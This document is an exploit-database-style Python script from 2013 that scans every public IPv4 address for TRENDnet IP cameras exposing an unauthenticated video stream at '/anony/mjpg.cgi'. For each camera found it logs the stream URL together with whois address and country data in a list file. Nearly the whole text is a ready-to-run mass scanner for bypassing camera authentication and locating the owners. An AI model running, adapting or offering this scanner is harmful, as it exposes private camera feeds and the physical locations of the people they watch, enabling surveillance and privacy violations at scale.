|
# Exploit Title: TRENDNet IP Cam Magic URL Searcher.
# Date: [10/04/2013]
# Author: [SnakingMax]
# Website: http://snakingmax.blogspot.com/
# Category: [Remote Exploit]
# Vulnerability description:
# Bypass the TRENDNet IP Cam authentication protection by ussing a magic url ^.^
#
# Software Description:
# This software scans Internet to find TRENDNet IP vulnerable cams.
from struct import *
from socket import *
from http.client import HTTPConnection
import urllib.request
import subprocess
def isPublicIP(ip):
#This method responses True if is a public IP or False in otherwise.
f = unpack('!I',inet_pton(AF_INET,ip))[0]
private = (["127.0.0.0","255.0.0.0"],["192.168.0.0","255.255.0.0"],["172.16.0.0","255.240.0.0"],["10.0.0.0","255.0.0.0"])
for net in private:
mask = unpack('!I',inet_aton(net[1]))[0]
p = unpack('!I',inet_aton(net[0]))[0]
if (f & mask) == p:
return False
return True
def isPublicWebcam(ip):
#This method responses True if the IP is a webcam or False in otherwise.
try:
conn = HTTPConnection(ip, 80, timeout=5)
conn.request('GET', "/anony/mjpg.cgi")
response = conn.getresponse()
if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'):
response.close()
conn.close()
return True
response.close()
conn.close()
return False
except Exception as E:
return False
response.close()
conn.close()
def addThisCamToMyList(camIP):
#This method save data into a file called CamList.txt
camlist = open("CamList.txt", "at")
camlist.write("------------------------WEBCAM------------------------\n")
#Saving URL.
camlist.write(" URL: http://"+camIP+"/anony/mjpg.cgi\n")
#Getting and writting whois Information about the cam ip.
whoisInfo = subprocess.check_output(["whois", camIP])
whoisList = str(whoisInfo).split("\\n")
#Getting and writting address information.
for i in whoisList:
if (i.count("address")>0):
camlist.write(" ADDRESS:\n")
camlist.write(i[8:]+"\n")
#Getting and writting country Information.
for i in whoisList:
if (i.count("country")>0):
camlist.write(" COUNTRY:\n")
print(i[:8]+"\n")
break
camlist.write("------------------------------------------------------\n")
camlist.close()
if ( (__name__)=="__main__" ):
#Generating IP address.
for a in reversed(range(256)):
for b in reversed(range(256)):
for c in reversed(range(256)):
for d in range(1,255):
generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d)
#Check if generated IP is public.
if(isPublicIP(generatedIP)):
print("Testing IP: "+generatedIP)
#Check if the IP is a webcam.
if (isPublicWebcam(generatedIP)):
print(generatedIP + " is a webcam ;-)")
#Saving data about the camera into a file.
addThisCamToMyList(generatedIP)
# ____ _ _ __ __
# / ___| _ __ __ _| | _(_)_ __ __ _| \/ | __ ___ __
# \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
# ___) | | | | (_| | <| | | | | (_| | | | | (_| |> < ____
# ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_| |_|\__,_/_/\_\__/ O \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/ \
|